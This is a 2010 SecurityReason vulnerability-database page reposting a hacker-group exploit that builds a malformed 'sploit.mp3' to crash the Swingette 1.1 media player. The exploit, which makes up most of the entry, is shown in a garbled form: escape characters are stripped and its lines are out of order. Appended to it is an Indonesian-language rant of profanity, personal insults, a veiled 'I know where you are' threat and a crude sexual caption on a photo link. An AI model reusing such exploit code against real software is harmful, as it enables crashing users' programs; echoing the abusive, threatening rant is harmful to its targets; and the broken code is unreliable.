SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
IT News
Search
SecurityAlert Database
About SecurityAlert
ExploitAlert Database
SecurityReason Research
WLB
WLB Database
Send to WLB
About WLB
Services
Security Audit
Schedule
Prices of services
Contact
RSS
SecurityReason IT News
SecurityAlert
World Laboratory of Bugtraq
ExploitAlert
Apache
PHP
Corporate
Contact
About SecurityReason
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com
Home arrow World Laboratory of Bugtraq Database

Arrow  Topic :

Swingette 1.1 buffer overflow denial of service


Arrow  WLB : WLB-2010030067  (About)
Arrow  SecurityAlert : None
Arrow  Date : 2010-03-16
Arrow  Credit          : Inj3ct0r
Arrow  SecurityRisk : Medium  Security Risk Medium  (About)
Arrow  Remote : No
Arrow  Local     : Yes
Arrow  Status   : Bug

Arrow  History : [2010-03-16] Started

Arrow  Affected software :  Swingette 1.1



Arrow  Text :  

# SWINGETTE 1.1 (.mp3) Buffer Overflow DOS Exploit

# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
# 0 _ __ __ __ 1
# 1 /' __ /'__` / __ /'__` 0
# 0 /_, ___ /_/_ ___ ,_/ / _ ___ 1
# 1 /_/ /' _ ` / /_/__<_ /'___ / /`'__ 0
# 0 / / / / __/ _ _ / 1
# 1 _ _ __ ____/ ____\ __\ ____/ _ 0
# 0 /_//_//_/ _ /___/ /____/ /__/ /___/ /_/ 1
# 1 ____/ >> Exploit database separated by exploit
0
# 0 /___/ type (local, remote, DoS, etc.) 1
# 1 1
# 0 [+] Site : Inj3ct0r.com 0
# 1 [+] Support e-mail : submit[at]inj3ct0r.com 1
# 0 0
# 1 ###################################### 1
# 0 I'm cr4wl3r member from Inj3ct0r Team 1
# 1 ###################################### 0
# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

#[+] Discovered By: cr4wl3r


print mp3
"x00x00x00x06x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00
x06x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x06x00x00x00x00
x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00
x06x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x06x00x00x00x00
x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00
x06x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x06x00x00x00x00
x00x00".
print mp3 "x4Dx54x68x64";
print mp3 "x4Dx54x68x64";
print mp3 "x4Dx54x68x64";
print mp3 "x4Dx54x68x64";
open(mp3, ">sploit.mp3");


# Note: dapet email account doank??? bruakakaka. eh njing loe tanya aja ama
FO nya langsung. gw dapet apa???
# bukannya loe yang ngirim email ama FOnya buat ngelink web loe???
sampe skrng engga direp ama FO nya. krna dia tau loe itu dodol.
# loe bilang apa??? keluarga gw??? wkwkwkwkwk. loe aja belum lepas
netek dari mak loe mau ngajak berantem???
# eh njink gw tau loe dimana skrng.
# gw ama temen forum gw??? tuh liahat aja siapa special Greets noh???
yang paling ujung tuh siapa??? dia anak forum gw njing, dan smpe itu loe
minta2 ampun ama dia krna blog loe engga hidup2 lagi ampe skrng.
# masih mau belagu loe njing??? badan hanya tinggal bonus gitu engga
usah belagu.

# Lame in Action:
http://photos-b.ak.fbcdn.net/hphotos-ak-snc3/hs028.snc3/11559_1259969493634
_1061556093_848543_5837025_n.jpg (emut nih kontol gw njink)





Audyt bezpieczeństwa

Security Audit

Analiza powłamaniowa

Arrow  References :  

None

If you want change this note, please use UCP
Alert

libc/fnmatch(3) DoS

Security Risk Medium- 2011-05-13

Allow attacker to denial of service apache 2.2.17 server
Apache RSS Apache Alert

» Apache HTTP Server Denial
   of Service Vulnerability

» Multiple Vendors
   libc/fnmatch(3) DoS (incl
   apache poc)

» Apache Continuum
   cross-site scripting
   vulnerability

» Apache Tomcat DoS
   Vulnerability
Copyright © SecurityReason.com. All Rights Reserved.